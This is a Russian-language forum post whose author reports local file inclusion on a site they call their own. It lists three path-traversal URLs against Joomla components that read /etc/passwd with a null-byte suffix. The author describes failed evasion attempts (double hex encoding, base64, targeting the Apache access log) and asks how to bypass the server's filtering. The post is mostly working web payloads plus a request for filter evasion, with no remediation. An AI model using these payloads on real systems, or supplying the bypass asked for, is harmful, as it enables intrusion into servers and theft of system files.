Приветствую, тоже нашел у себя на сайте LFI\RFI\RCE.
пример LFI:
https://сайт.com/index.php?option=com_custompages&cpage=../../../../../../../../../../../../../../../../etc/passwd%00
https://сайт.com/index.php?option=com_pro_desk&include_file=../../../../../../../../../../../../../../../../etc/passwd%00
https://сайт.com/index.php?option=com_letterman&task=view&Itemid=&m osConfig_absolute_path=../../../../../../../../../../../../../../../../etc/passwd%00
Но при вставке в браузер происходит фильтрация, и ничего не отображается,
пробовал также заменять ../ на двойное кодирование в шестнадцатеричную кодировку, при котором «../» заменяется на «%252E%252E%252F,
также пробовал с base64 передать
также вместо etc/passwd вставлял var/log/apache2/access.log
и т.д. и тому подобное, все равно ничего не показывает.
Подскажите как можно обойти это? серв дебиан9 апач последний пхп7